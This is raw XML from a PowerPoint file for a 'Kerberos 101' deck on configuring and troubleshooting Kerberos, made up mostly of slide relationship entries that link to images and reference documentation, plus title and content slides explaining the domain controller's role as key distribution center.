Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.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82.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide54.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83.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide54.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide55.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82.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide55.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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111.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide56.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/cc237249.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide57.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/"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5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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ietf.org/rfc/rfc4757.txt" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/en-us/library/cc772815(v=WS.10).aspx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ietf.org/rfc/rfc1964.txt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ietf.org/rfc/rfc4120.txt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc246071(v=prot.13).aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/cc233855(v=PROT.13).aspx"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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/bid/233/discuss" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide62.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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5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70.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/244474" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></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55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/327825" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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9.xml"/></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127.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide78.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide79.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7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide79.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.mit.edu/Kerberos/" TargetMode="External"/><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80.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83.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide80.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide81.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.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82.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject3.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide83.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide84.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc160954(v=msdn.10)" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide87.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/299656/how-to-prevent-windows-from-storing-a-lan-manager-hash-of-your-passwor" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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_rels/slide90.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90.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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 Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.iu.edu/d/aumh" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide95.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/raandree/8d7a5e7f8577cfc4a76483193654e7f5" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/cd/E19683-01/806-4078/6jd6cjs1q/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/"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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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de-DE" dirty="0"/>
              <a:t>Raimund Andrée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>raimund.andree@microsoft.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Kerberos 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuring and Troubleshooting Kerberos</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308150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5"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="648742" y="1261335"/>
                <a:ext cx="7924800" cy="2516651"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>All the security principals trust one entity, the domain controller.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Each security principal shares a hashed password with the DC.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Only n passwords are needed, instead of </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:d>
                      <m:dPr>
                        <m:ctrlPr>
                          <a:rPr lang="pt-BR" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                        </m:ctrlPr>
                      </m:dPr>
                      <m:e>
                        <m:f>
                          <m:fPr>
                            <m:type m:val="noBar"/>
                            <m:ctrlPr>
                              <a:rPr lang="pt-BR" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:fPr>
                          <m:num>
                            <m:r>
                              <a:rPr lang="pt-BR" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                              <m:t>𝑛</m:t>
                            </m:r>
                          </m:num>
                          <m:den>
                            <m:r>
                              <a:rPr lang="en-US" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                              <m:t>2</m:t>
                            </m:r>
                          </m:den>
                        </m:f>
                      </m:e>
                    </m:d>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="10000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kerberos: the DC will provide ad-hoc session keys for two security principals that need to authenticate. The domain controller becomes a key distribution center (KDC)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>There is no key management required</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="Content Placeholder 1"/>
              <p:cNvSpPr>
                <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph idx="15"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="648742" y="1261335"/>
                <a:ext cx="7924800" cy="2516651"/>
              </a:xfrm>
              <a:blipFill rotWithShape="0">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect t="-2906" r="-538" b="-5085"/>
                </a:stretch>
              </a:blipFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="de-DE">
                    <a:noFill/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
